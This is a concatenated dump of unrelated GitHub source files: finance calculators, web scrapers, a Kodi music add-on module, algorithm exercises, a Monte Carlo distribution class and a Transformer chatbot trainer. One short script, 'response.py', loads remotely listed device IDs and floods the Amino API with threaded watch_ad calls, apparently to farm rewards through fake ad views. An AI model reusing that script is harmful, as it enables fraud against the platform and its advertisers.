12\n \n def roi(self):\n self.roi = CashOnCash.anual_cashflow(self) / CashOnCash.invested(self)\n self.roi *= 100\n print(f\"\\nThe cash on cash ROI for this property is {self.roi}%\")\n \nincome = 2000\ntaxes = 150\ninsurance = 100\nutilities = 0\nhoa = 0\nlawn_snow = 0\nvacancy = 100\nrepairs = 100\ncapex = 100\nproperty_management = 200\nmortgage = 860\n\ndownpayment = 40000\nclosing_costs = 3000\nrehab_budget = 7000\nmisc = 0\n\nrental_property = CashOnCash(income)\n\nrental_property.expenses(taxes, insurance, vacancy, repairs, capex, property_management, mortgage)\nrental_property.cashflow()\nrental_property.anual_cashflow()\nrental_property.roi()\n\n","repo_name":"Quinn-Polnisch/module3_rental_roi","sub_path":"rental.py","file_name":"rental.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14786804259","text":"#! usr/bin/python3\n\n# MOVE MAJORITY OF CODE INTO SCRAPPER CLASS\n# remove if comment and nav to each page and find the comment total\n\nimport re\nimport requests as r\nimport dhtmlparser as d\nimport dryscrape\n\nign_content = r.get(\"http://www.ign.com\").content\ndom = d.parseString(ign_content)\n\narticles = dom.find(\"div\", {\"class\": \"listElmnt-blogItem\"})\nlatest_reviews = dom.find(\"div\", {\"class\": \"column-game\"})\n\nfor review in latest_reviews:\n link_review = re.findall( r'href=\"(.*?)\"', str(review) )\n heading_review = re.findall( r'class=\"game-title\">(.*?)<', str(review) )\n rating_review = re.findall( r'class=\"rating\">(.*?)<', str(review) )\n if rating_review:\n print (heading_review[0])\n print (rating_review[0])\n if link_review:\n sess = dryscrape.Session()\n sess.visit(link_review[0])\n response = sess.body()\n dom_link = d.parseString(response)\n find_comment = dom_link.find(\"div\", {\"class\": \"article-comments wrap\"})\n for comment in find_comment:\n amount = re.findall( r'(.*?)<', str(comment) )\n print (amount)\n \nfor article in articles:\n heading_article = re.findall( r'>(.*?)\\n

', str(article) )\n summary_article = re.findall( r'(.*?)\", text)\r\nprint(boyer_moore(text, pattern))\r\n","repo_name":"jaqlig/algorithms","sub_path":"String-searching/Boyer–Moore algorithm/boyer_moore.py","file_name":"boyer_moore.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37775017019","text":"import xbmcgui\n\nfrom inode import INode\nfrom debug import warn\nfrom gui.util import lang, getSetting\nfrom gui.util import getImage, notifyH, executeBuiltin, containerUpdate \nfrom node import getNode, Flag\nfrom renderer import renderer\nfrom api import api\nfrom exception import QobuzXbmcError as Qerror\nfrom cache import cache\nimport qobuz\n\ndialogHeading = lang(30081)\n\nclass Node_favorites(INode):\n '''Displaying user favorites (track and album)\n '''\n def __init__(self, parent=None, parameters=None):\n super(Node_favorites, self).__init__(parent, parameters)\n self.nt = Flag.FAVORITES\n self.set_label(lang(30079))\n self.name = lang(30079)\n self.label = lang(30079)\n self.content_type = 'albums'\n self.image = getImage('favorites')\n self.offset = self.get_parameter('offset') or 0\n\n def fetch(self, Dir, lvl, whiteFlag, blackFlag):\n limit = getSetting('pagination_limit')\n data = api.get('/favorite/getUserFavorites', \n user_id=api.user_id, \n limit=limit, \n offset=self.offset)\n if not data:\n warn(self, \"Build-down: Cannot fetch favorites data\")\n return False\n self.data = data\n return True\n\n def populate(self, Dir, lvl, whiteFlag, blackFlag):\n if 'artists' in self.data:\n self.__populate_artists(Dir, lvl, whiteFlag, blackFlag) \n if 'albums' in self.data:\n self.__populate_albums(Dir, lvl, whiteFlag, blackFlag)\n if 'tracks' in self.data:\n self.__populate_tracks(Dir, lvl, whiteFlag, blackFlag)\n return True\n\n def __populate_tracks(self, Dir, lvl, whiteFlag, blackFlag):\n for track in self.data['tracks']['items']:\n node = getNode(Flag.TRACK)\n node.data = track\n self.add_child(node)\n\n def __populate_albums(self, Dir, lvl, whiteFlag, blackFlag):\n for album in self.data['albums']['items']:\n node = getNode(Flag.ALBUM)\n node.data = album\n self.add_child(node)\n \n def __populate_artists(self, Dir, lvl, whiteFlag, blackFlag):\n for artist in self.data['artists']['items']:\n node = getNode(Flag.ARTIST)\n node.data = artist\n node.fetch(None, None, None, Flag.NONE)\n self.add_child(node)\n\n def get_description(self):\n return self.get_property('description')\n\n def gui_add_albums(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n nodes = self.list_albums(qnt, qid)\n if len(nodes) == 0:\n notifyH(dialogHeading, lang(36004))\n return False\n ret = xbmcgui.Dialog().select(lang(36005), [\n node.get_label() for node in nodes \n ])\n if ret == -1:\n return False\n album_ids = ','.join([node.nid for node in nodes])\n if not self.add_albums(album_ids):\n notifyH(dialogHeading, 'Cannot add album(s) to favorite')\n return False\n notifyH(dialogHeading, 'Album(s) added to favorite')\n return True\n\n def gui_add_artists(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n nodes = self.list_artists(qnt, qid)\n if len(nodes) == 0:\n notifyH(dialogHeading, lang(36004))\n return False\n ret = xbmcgui.Dialog().select(lang(36007), [\n node.get_label() for node in nodes \n ])\n if ret == -1:\n return False\n artist_ids = ','.join([str(node.nid) for node in nodes])\n if not self.add_artists(artist_ids):\n notifyH(dialogHeading, 'Cannot add artist(s) to favorite')\n return False\n notifyH(dialogHeading, 'Artist(s) added to favorite')\n return True\n \n\n def list_albums(self, qnt, qid):\n album_ids = {}\n nodes = []\n if qnt & Flag.ALBUM == Flag.ALBUM:\n node = getNode(Flag.ALBUM, {'nid': qid})\n node.fetch(None, None, None, None)\n album_ids[str(node.nid)] = 1\n nodes.append(node)\n elif qnt & Flag.TRACK == Flag.TRACK:\n render = renderer(qnt, self.parameters)\n render.depth = 1\n render.whiteFlag = Flag.TRACK\n render.blackFlag = Flag.NONE\n render.asList = True\n render.run()\n if len(render.nodes) > 0:\n node = getNode(Flag.ALBUM)\n node.data = render.nodes[0].data['album']\n album_ids[str(node.nid)] = 1\n nodes.append(node)\n else:\n render = renderer(qnt, self.parameters)\n render.depth = -1\n render.whiteFlag = Flag.ALBUM\n render.blackFlag = Flag.STOPBUILD & Flag.TRACK\n render.asList = True\n render.run()\n for node in render.nodes:\n if node.nt & Flag.ALBUM: \n if not str(node.nid) in album_ids:\n album_ids[str(node.nid)] = 1\n nodes.append(node)\n if node.nt & Flag.TRACK:\n render = renderer(qnt, self.parameters)\n render.depth = 1\n render.whiteFlag = Flag.TRACK\n render.blackFlag = Flag.NONE\n render.asList = True\n render.run()\n if len(render.nodes) > 0:\n newnode = getNode(Flag.ALBUM)\n newnode.data = render.nodes[0].data['album']\n if not str(newnode.nid) in album_ids:\n nodes.append(newnode)\n album_ids[str(newnode.nid)] = 1\n return nodes\n\n def add_albums(self, album_ids):\n ret = api.favorite_create(album_ids=album_ids)\n if not ret:\n return False\n self._delete_cache()\n return True\n \n def add_artists(self, artist_ids):\n ret = api.favorite_create(artist_ids=artist_ids)\n if not ret:\n return False\n self._delete_cache()\n return True\n\n def gui_add_tracks(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n nodes = self.list_tracks(qnt, qid)\n if len(nodes) == 0:\n notifyH(dialogHeading, lang(3600))\n return False\n ret = xbmcgui.Dialog().select(lang(36006), [\n node.get_label() for node in nodes \n ])\n if ret == -1:\n return False\n track_ids = ','.join([str(node.nid) for node in nodes])\n if not self.add_tracks(track_ids):\n notifyH(dialogHeading, 'Cannot add track(s) to favorite')\n return False\n notifyH(dialogHeading, 'Track(s) added to favorite')\n return True\n\n def list_tracks(self, qnt, qid):\n track_ids = {}\n nodes = []\n if qnt & Flag.TRACK == Flag.TRACK:\n node = getNode(Flag.TRACK, {'nid': qid})\n node.fetch(None, None, None, Flag.NONE)\n track_ids[str(node.nid)] = 1\n nodes.append(node)\n else:\n render = renderer(qnt, self.parameters)\n render.depth = -1\n render.whiteFlag = Flag.TRACK\n render.asList = True\n render.run()\n for node in render.nodes:\n if not str(node.nid) in track_ids:\n nodes.append(node)\n track_ids[str(node.nid)] = 1\n return nodes\n\n def list_artists(self, qnt, qid):\n artist_ids = {}\n nodes = []\n if qnt & Flag.ARTIST == Flag.ARTIST:\n node = getNode(Flag.ARTIST, {'nid': qid})\n node.fetch(None, None, None, Flag.NONE)\n artist_ids[str(node.nid)] = 1\n nodes.append(node)\n else:\n render = renderer(qnt, self.parameters)\n render.depth = -1\n render.whiteFlag = Flag.ALBUM & Flag.TRACK\n render.blackFlag = Flag.TRACK & Flag.STOPBUILD\n render.asList = True\n render.run()\n for node in render.nodes:\n artist = getNode(Flag.ARTIST, {'nid': node.get_artist_id()})\n if not artist.fetch(None, None, None, Flag.NONE):\n continue\n if not str(artist.nid) in artist_ids:\n nodes.append(artist)\n artist_ids[str(artist.nid)] = 1\n return nodes\n\n def add_tracks(self, track_ids):\n ret = api.favorite_create(track_ids=track_ids)\n if not ret:\n return False\n self._delete_cache()\n return True\n\n def _delete_cache(self):\n limit = getSetting('pagination_limit')\n key = cache.make_key('/favorite/getUserFavorites', \n user_id=api.user_id, \n limit=limit, \n offset=self.offset)\n return cache.delete(key)\n\n def del_track(self, track_id):\n if api.favorite_delete(track_ids=track_id):\n self._delete_cache()\n return True\n return False\n\n def del_album(self, album_id):\n if api.favorite_delete(album_ids=album_id):\n self._delete_cache()\n return True\n return False\n\n def del_artist(self, artist_id):\n if api.favorite_delete(artist_ids=artist_id):\n self._delete_cache()\n return True\n return False\n\n def gui_remove(self):\n qnt, qid = int(self.get_parameter('qnt')), self.get_parameter('qid')\n node = getNode(qnt, {'nid': qid})\n ret = None\n if qnt & Flag.TRACK == Flag.TRACK:\n ret = self.del_track(node.nid)\n elif qnt & Flag.ALBUM == Flag.ALBUM:\n ret = self.del_album(node.nid)\n elif qnt & Flag.ARTIST == Flag.ARTIST:\n ret = self.del_artist(node.nid)\n else:\n raise Qerror(who=self, what='invalid_node_type', \n additional=self.nt)\n if not ret:\n notifyH(dialogHeading, \n 'Cannot remove item: %s' % (node.get_label()))\n return False\n notifyH(dialogHeading, \n 'Item successfully removed: %s' % (node.get_label()))\n url = self.make_url(nt=self.nt, nid='', nm='')\n executeBuiltin(containerUpdate(url, True))\n return True\n","repo_name":"tidalf/dc.xbmc.addons","sub_path":"plugin.audio.qobuz/resources/lib/qobuz/node/favorites.py","file_name":"favorites.py","file_ext":"py","file_size_in_byte":10554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71073506012","text":"import os\n\ndef isescape(view):\n if (view[0][1] == 'e'):\n return(4)\n elif (view[1][0] == 'e'):\n return(2)\n elif (view[2][1] == 'e'):\n return(3)\n elif (view[1][2] == 'e'):\n return(1)\n else:\n return (0)\nfn = \"dirtdi\"\ndef tkt(view):\n if view == [\"---\",\"---\",\"--#\"] and not os.path.exists(fn):\n fh = open(fn, \"w\")\n fh.writelines(\"okokok\")\n fh.close()\n return(1)\n else:\n return(0)\naction = [\"RIGHT\",\"LEFT\", \"DOWN\", \"UP\"]\n\nn = input()\nview = [input() for i in range(3)]\nesc = isescape(view)\nif (esc):\n res = esc - 1\nelif(tkt(view)):\n res = 0\nelif (view[0][1] == '-'):\n res = 3\nelif (view[1][0] == '-'):\n res = 1\nelif (view[2][1] == '-'):\n res = 2\nelse:\n res = 0\nprint(action[res])\n","repo_name":"lvoneduval/hackerrank","sub_path":"Artificial_intelligence/Bot_Building/06_Maze_Escape.py","file_name":"06_Maze_Escape.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43914517000","text":"import collections\nimport random\nimport numpy as np\nfrom .. import McBase\n\n\nclass Exponential(McBase):\n\n \"\"\"\n This class defines a survival game, i.e., each round has p death rate.\n p is very small. p is per-turn mortality rate, or a capacitor having a probability of being broken down per unit of time). \n We define this survival game to illustrate the underlying mechanism of the exponential distribution. Because the sudden death game can approximate many real-life accidents or electronic component failures (e.g., capacity breakdown or LCD pixel defect), the resulting exponential distribution can be used in survival analysis and lifespan estimation. In each round of this survival game, the test subject (player) is faced with a very low sudden death probability (p).\n If you choose p = 0.001 and simulate 10,000 MC rounds. The generated histogram is very close to the exponential distribution. This function can be used to illustrate the generation mechanism of the exponential distribution.\n \n p(x) = $ 1/\\theta * exp(-x/\\theta) $ , if x > 0\n \"\"\"\n\n def __init__(self, N=10000, n=1000, p=0.01):\n '''\n Parameters\n ----------\n n : survival game rounds\n p : The probability of sudden death / failure / accident per round\n '''\n super().__init__(\"expon\", N)\n self.num_rounds = n\n self.p = p\n\n def run(self, display=True):\n survival_rounds = []\n for _ in range(self.N):\n fate = random.choices([0, 1], weights=(1-self.p, self.p), k=self.num_rounds)\n if 1 in fate:\n survival_rounds.append(fate.index(1))\n # else: # still lives, i.e., > num_rounds\n # survival_rounds.append(num_rounds)\n\n c = collections.Counter(survival_rounds)\n x_theory = range(np.array(list(c.keys())).min(), np.array(list(c.keys())).max() + 1)\n theory = super().init_theory(dist=self.dist, x_theory=x_theory, p=self.p)\n\n if display:\n super().bar(x=c.keys(), y=c.values(), title=\"Frequency Histogram\\nper-round sudden death probability p=\" +\n str(self.p) + ', game rounds = ' + str(self.num_rounds) + ', simulations = ' + str(self.N), draw_points=False)\n super().plot(x=x_theory, y=theory, label='θ=' + str(round(1 / self.p + 0.5)),\n title='Theoretical Distribution\\nexponential(θ=' + str(round(1 / self.p + 0.5)) + ')')\n","repo_name":"zhangys11/mc","sub_path":"src/mc/distributions/_exponential.py","file_name":"_exponential.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"21279423134","text":"# Convert 'chatbot_demo.ipynb' to a single file.\n# Ref.: https://doheon.github.io/%EC%BD%94%EB%93%9C%EA%B5%AC%ED%98%84/nlp/ci-chatbot-post/\n\nimport torch\nimport torch.nn as nn\nimport pandas as pd\nimport re\nimport urllib.request\nimport sentencepiece as spm\nimport numpy as np\nfrom tqdm import tqdm\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\npd.set_option('mode.chained_assignment', None) # SettingWithCopyWarning 경고 무시\n\n\"\"\"\nPreprocess part\n\"\"\"\nclass Preprocess:\n def __init__(self):\n # urllib.request.urlretrieve(\"https://raw.githubusercontent.com/songys/Chatbot_data/master/ChatbotData.csv\", filename=\"ChatBotData.csv\")\n # self.train_data = pd.read_csv('ChatBotData.csv')\n self.train_data = pd.read_csv(\"KETI_대화데이터_응급상황.txt\", sep='\\t', names=[\"index\", \"Q\"])\n self.train_data['A'] = self.train_data['Q'].iloc[1:]\n for i in range(len(self.train_data)-1):\n self.train_data['A'].iloc[i] = self.train_data['A'].iloc[i+1]\n self.train_data = self.train_data.iloc[:-1]\n self.train_data.to_csv(\"./KETI_대화데이터_응급상황_QA.csv\", sep=',', index=False)\n\n def remove_punctuation(self):\n print(\"Train data samples: \\n\", self.train_data.head())\n print(\"챗봇 샘플 개수: \", len(self.train_data), '\\n')\n print(\"결측치 수: \\n\", self.train_data.isnull().sum())\n\n # 구두점 띄어쓰기\n questions = []\n for sentence in self.train_data['Q']:\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n sentence = sentence.strip()\n questions.append(sentence)\n\n answers = []\n for sentence in self.train_data['A']:\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n sentence = sentence.strip()\n answers.append(sentence)\n\n return questions, answers\n\n # Bert pretrained tokenize를 사용하지 않고 직접 토크나이징하는 방법.\n def sent_piece(self, corpus):\n prefix = \"chatbot\"\n vocab_size = 8000\n spm.SentencePieceTrainer.train(\n f\"--input={corpus} --model_prefix={prefix} --vocab_size={vocab_size + 7}\" +\n \" --model_type=bpe\" +\n \" --max_sentence_length=999999\" +\n \" --pad_id=0 --pad_piece=[PAD]\" + # pad (0)\n \" --unk_id=1 --unk_piece=[UNK]\" + # unknown (1)\n \" --bos_id=2 --bos_piece=[BOS]\" + # begin of sequence (2)\n \" --eos_id=3 --eos_piece=[EOS]\" + # end of sequence (3)\n \" --user_defined_symbols=[SEP],[CLS],[MASK]\") # 사용자 정의 토큰\n\n vocab_file = \"chatbot.model\"\n vocab = spm.SentencePieceProcessor()\n vocab.load(vocab_file)\n line = \"안녕하세요 만나서 반갑습니다\" # Example\n pieces = vocab.encode_as_pieces(line) # token = piece\n ids = vocab.encode_as_ids(line) # piece(token)들의 단어 id 목록\n\n print(\"[Result Example]\")\n print(\"Query: \", line)\n print(\"Piece(token): \", pieces)\n print(\"Id: \", ids)\n\n return vocab\n\n # 학습된 vocab을 이용해서 주어진 문장을 정수로 인코딩\n # 토큰화 / 정수인코딩 / 시작토큰과 종료토큰 추가 / 패딩\n def tokenize_and_filter(self, inputs, outputs, MAX_LENGTH, vocab):\n START_TOKEN = [2]\n END_TOKEN = [3]\n\n tokenized_inputs, tokenized_outputs = [], []\n\n for (sentence1, sentence2) in zip(inputs, outputs):\n # encdoe(토큰화 + 정수인코딩), 시작토큰과 종료토큰 추가\n zeros1 = np.zeros(MAX_LENGTH, dtype=int)\n zeros2 = np.zeros(MAX_LENGTH, dtype=int)\n sentence1 = START_TOKEN + vocab.encode_as_ids(sentence1) + END_TOKEN\n zeros1[:len(sentence1)] = sentence1[:MAX_LENGTH]\n\n sentence2 = START_TOKEN + vocab.encode_as_ids(sentence2) + END_TOKEN\n zeros2[:len(sentence2)] = sentence2[:MAX_LENGTH]\n\n tokenized_inputs.append(zeros1)\n tokenized_outputs.append(zeros2)\n\n return tokenized_inputs, tokenized_outputs\n\n\n\"\"\"\nDataset part\n\"\"\"\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass SequenceDataset(Dataset):\n def __init__(self, questions, answers):\n questions = np.array(questions)\n answers = np.array(answers)\n self.inputs = questions\n self.dec_inputs = answers[:, :-1]\n self.outputs = answers[:, 1:]\n self.length = len(questions)\n\n def __getitem__(self, idx):\n return (self.inputs[idx], self.dec_inputs[idx], self.outputs[idx])\n\n def __len__(self):\n return self.length\n\n\n\"\"\"\nModel part\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom torch.nn import Transformer\nimport math\n\nclass ChatbotModel(nn.Module):\n # ntoken: vocab의 size\n # embed: embedding size\n # nhead: head의 개수\n # hidden: feedforward 차원\n # nlayers: layer 개수\n def __init__(self, ntoken, embed, nhead, hidden, nlayers, dropout=0.5):\n super(ChatbotModel, self).__init__()\n self.transformer = Transformer(embed, nhead, dim_feedforward=hidden, num_encoder_layers=nlayers, num_decoder_layers=nlayers, dropout=dropout)\n self.pos_encoder = PositionalEncoding(embed, dropout)\n self.encoder = nn.Embedding(ntoken, embed)\n\n self.pos_encoder_d = PositionalEncoding(embed, dropout)\n self.encoder_d = nn.Embedding(ntoken, embed)\n\n self.embed = embed\n self.ntoken = ntoken\n self.linear = nn.Linear(embed, ntoken)\n self.init_weights()\n\n def generate_square_subsequent_mask(self, sz):\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n\n return mask\n\n def init_weights(self):\n initrange = 0.1\n self.encoder.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, src, tgt, srcmask, tgtmask, srcpadmask, tgtpadmask):\n src = self.encoder(src) * math.sqrt(self.embed)\n src = self.pos_encoder(src)\n\n tgt = self.encoder_d(tgt) * math.sqrt(self.embed)\n tgt = self.pos_encoder_d(tgt)\n\n output = self.transformer(src.transpose(0,1), tgt.transpose(0,1), srcmask, tgtmask, src_key_padding_mask=srcpadmask, tgt_key_padding_mask=tgtpadmask)\n output = self.linear(output)\n return output\n\n\ndef gen_attention_mask(x):\n mask = torch.eq(x, 0)\n return mask\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, dropout=0.1, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0,1)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n\ndef preprocess_sentence(sentence):\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n sentence = sentence.strip()\n return sentence\n\n\ndef train():\n MAX_LENGTH = 40\n BATCH_SIZE = 64\n lr = 1e-4\n epoch =100\n vocab_size = 8000\n\n\n pre = Preprocess()\n questions, answers = pre.remove_punctuation()\n\n # csv를 하나씩 한 줄씩 잘라서 txt로 바꿔줌\n with open('all.txt', 'w', encoding='utf8') as f:\n f.write('\\n'.join(questions))\n f.write('\\n'.join(answers))\n\n vocab = pre.sent_piece(\"all.txt\")\n\n questions_encode, answers_encode = pre.tokenize_and_filter(questions, answers, MAX_LENGTH, vocab)\n print(\"Question encoded example: \", questions_encode[0])\n print(\"Answer encoded example: \", answers_encode[0])\n\n dataset = SequenceDataset(questions_encode, answers_encode)\n dataloader = DataLoader(dataset, shuffle=True, batch_size=BATCH_SIZE)\n\n model = ChatbotModel(vocab_size+7, 256, 8, 512, 2, 0.2).to(device)\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n model.train()\n\n for i in range(epoch):\n batchloss = 0.0\n\n progress = tqdm(dataloader)\n for (inputs, dec_inputs, outputs) in progress:\n optimizer.zero_grad()\n src_mask = model.generate_square_subsequent_mask(MAX_LENGTH).to(device)\n src_padding_mask = gen_attention_mask(inputs).to(device)\n tgt_mask = model.generate_square_subsequent_mask(MAX_LENGTH-1).to(device)\n tgt_padding_mask = gen_attention_mask(dec_inputs).to(device)\n\n result = model(inputs.to(device), dec_inputs.to(device), src_mask,\n tgt_mask, src_padding_mask, tgt_padding_mask)\n loss = criterion(result.permute(1, 2, 0), outputs.to(device).long())\n progress.set_description(\"{:0.3f}\".format(loss))\n loss.backward()\n optimizer.step()\n batchloss += loss\n print(\"epoch:\", i + 1, \"|\", \"loss:\", batchloss.cpu().item() / len(dataloader))\n\n return vocab, model\n\n\ndef evaluate(sentence, vocab, model):\n START_TOKEN = [2]\n END_TOKEN = [3]\n MAX_LENGTH = 40\n\n sentence = preprocess_sentence(sentence)\n input = torch.tensor([START_TOKEN + vocab.encode_as_ids(sentence) + END_TOKEN]).to(device)\n output = torch.tensor([START_TOKEN]).to(device)\n\n # 디코더의 예측 시작\n model.eval()\n for i in range(MAX_LENGTH):\n src_mask = model.generate_square_subsequent_mask(input.shape[1]).to(device)\n tgt_mask = model.generate_square_subsequent_mask(output.shape[1]).to(device)\n\n src_padding_mask = gen_attention_mask(input).to(device)\n tgt_padding_mask = gen_attention_mask(output).to(device)\n\n predictions = model(input, output, src_mask, tgt_mask, src_padding_mask, tgt_padding_mask).transpose(0, 1)\n # 현재(마지막) 시점의 예측 단어��� 받아온다.\n predictions = predictions[:, -1:, :]\n predicted_id = torch.LongTensor(torch.argmax(predictions.cpu(), axis=-1))\n\n\n # 만약 마지막 시점의 예측 단어가 종료 토큰이라면 예측을 중단\n if torch.equal(predicted_id[0][0], torch.tensor(END_TOKEN[0])):\n break\n\n # 마지막 시점의 예측 단어를 출력에 연결한다.\n # 이는 for문을 통해서 디코더의 입력으로 사용될 예정이다.\n output = torch.cat([output, predicted_id.to(device)], axis=1)\n\n return torch.squeeze(output, axis=0).cpu().numpy()\n\n\ndef predict(sentence, vocab, model):\n vocab_size = 8000\n prediction = evaluate(sentence, vocab, model)\n predicted_sentence = vocab.Decode(list(map(int, [i for i in prediction if i < vocab_size + 7])))\n\n # print('Input: {}'.format(sentence))\n print('Chatbot: {}'.format(predicted_sentence))\n print()\n\n return predicted_sentence\n\nif __name__ == '__main__':\n vocab, model = train()\n data = pd.read_csv(\"KETI_대화데이터_응급상황_QA.csv\")\n data = data[data['Q'].str.contains('\\?')]['Q']\n\n\n is_init = True\n # 입력 받기\n while True:\n if is_init:\n idx = np.random.randint(0, len(data)-1, size=1)\n print(\"Chatbot: \", data.iloc[idx])\n is_init = False\n query = input(\"You say: \")\n\n if query == \"exit\":\n break\n\n result = predict(query, vocab, model)\n\n # print(\"Chatbot: \", result)\n # print(result)\n\n\n\n\n","repo_name":"ParkJun-Yeong/AlzheimerDetection","sub_path":"demo/chatbot_demo.py","file_name":"chatbot_demo.py","file_ext":"py","file_size_in_byte":11729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19804902506","text":"import samino\r\nfrom urllib.request import urlopen\r\nfrom threading import Thread\r\n\r\nwhile True:\r\n print(\"v2 sessão...\")\r\n \r\n f = urlopen(\"https://aarrgh.000webhostapp.com/doctxt/links.txt\")\r\n for l in f.readlines():\r\n us = l.decode('utf-8')\r\n cut = us.index(\"#\")\r\n cutend = us.index(\";\")\r\n link = us[0:cut]\r\n did = us[cut+1:cutend]\r\n print(link)\r\n print(did)\r\n try:\r\n client=samino.Client(deviceId=did)\r\n uid=client.get_from_link(link).objectId\r\n\r\n def c():\r\n client.watch_ad(uid)\r\n\r\n for _ in range(250):\r\n Thread(target=c).start() \r\n except Exception as er:\r\n print(er)\r\n","repo_name":"dandanpy/ftpamino","sub_path":"response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3084470358","text":"import Function as F\r\n\r\nF.go_url()\r\nitem_list = F.control_dict['tag'](\"td\")\r\nprint(\"item_list = \", len(item_list))\r\nindex = 0\r\nwhile index < 328:\r\n name_company = item_list[index].text\r\n item_list[index].click()\r\n data = F.control_dict['tag'](\"time\")\r\n data_1 = data[1].text\r\n data_2 = data[2].text\r\n data_3 = data[3].text\r\n F.control_dict['class']('inv-link' and 'text-secondary' and 'font-bold' and 'text-sm' and 'whitespace-normal', 0, 'click')\r\n if F.control_dict['class']('bp3-portal'):\r\n news = F.control_dict['class']('text-base')\r\n else:\r\n news = F.control_dict['class']('WYSIWYG' and 'articlePage')\r\n text_1 = ''\r\n for i in range(0, len(news)):\r\n text_1 += news[i].text\r\n F.go_url()\r\n item_list = F.control_dict['tag'](\"td\")\r\n item_list[index].click()\r\n F.control_dict['class']('inv-link' and 'text-secondary' and 'font-bold' and 'text-sm' and 'whitespace-normal', 1, 'click')\r\n if F.control_dict['class']('bp3-portal'):\r\n news = F.control_dict['class']('text-base')\r\n else:\r\n news = F.control_dict['class']('WYSIWYG' and 'articlePage')\r\n text_2 = ''\r\n for i in range(0, len(news)):\r\n text_2 += news[i].text\r\n F.go_url()\r\n item_list = F.control_dict['class'](\"td\")\r\n item_list[index].click()\r\n F.control_dict['class']('inv-link' and 'text-secondary' and 'font-bold' and 'text-sm' and 'whitespace-normal', 2, 'click')\r\n if F.control_dict['class']('bp3-portal'):\r\n news = F.control_dict['class']('text-base')\r\n else:\r\n news = F.control_dict['class']('WYSIWYG' and 'articlePage')\r\n text_3 = ''\r\n for i in range(0, len(news)):\r\n text_3 += news[i].text\r\n text = data_1, text_1, data_2, text_2, data_3, text_3\r\n print(text)\r\n F.go_url()\r\n index = index + 1\r\n item_list = F.control_dict['tag'](\"td\")\r\n last_price = item_list[index].text\r\n index = index + 1\r\n max_price = item_list[index].text\r\n index = index + 1\r\n min_price = item_list[index].text\r\n index = index + 1\r\n change = item_list[index].text\r\n index = index + 1\r\n percentage_change = item_list[index].text\r\n index = index + 1\r\n volume = item_list[index].text\r\n index = index + 1\r\n time = item_list[index].text\r\n index = index + 1\r\n print(name_company, last_price, max_price, min_price, change, percentage_change, volume, time)\r\n information = (\r\n f'{name_company}',\r\n f'{last_price}',\r\n f'{max_price}',\r\n f'{min_price}',\r\n f'{change}',\r\n f'{percentage_change}',\r\n f'{volume}',\r\n f'{time}',\r\n f'{text}'\r\n )\r\n F.import_sql('msd', information)\r\nelse:\r\n quit()\r\n","repo_name":"MichailRF/CompanyNews","sub_path":"AKompany.py","file_name":"AKompany.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29965863537","text":"\ndef is_economical(n):\n i = 2\n a = n\n factDict = {}\n while a > 1:\n if a % i == 0:\n if i not in factDict:\n factDict[i] = 1\n else:\n factDict[i] += 1\n a = a // i\n else:\n i += 1\n ctr = 0\n for k,v in factDict.items():\n ctr += len(str(k))\n if v != 1:\n ctr += len(str(v))\n \n if len(str(n)) > ctr:\n return 'Frugal'\n elif len(str(n)) == ctr:\n return 'Equidigital'\n else:\n return 'Wasteful'\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"XQwPPHE6ZSu4Er9ht_10.py","file_name":"XQwPPHE6ZSu4Er9ht_10.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9541581330","text":"# P1540 [NOIP2010 提高组] 机器翻译 https://www.luogu.com.cn/problem/P1540\n\nfrom collections import deque\nfrom typing import Deque\n\nM, N = map(int, input().split())\nmem: Deque[int] = deque()\nquery_times = 0\nfor word in map(int, input().split()):\n if word not in mem:\n query_times += 1\n if len(mem) >= M:\n mem.popleft()\n mem.append(word)\nprint(query_times)\n","repo_name":"frederick-wang/algorithm-exercises","sub_path":"luogu/P1540 [NOIP2010 提高组] 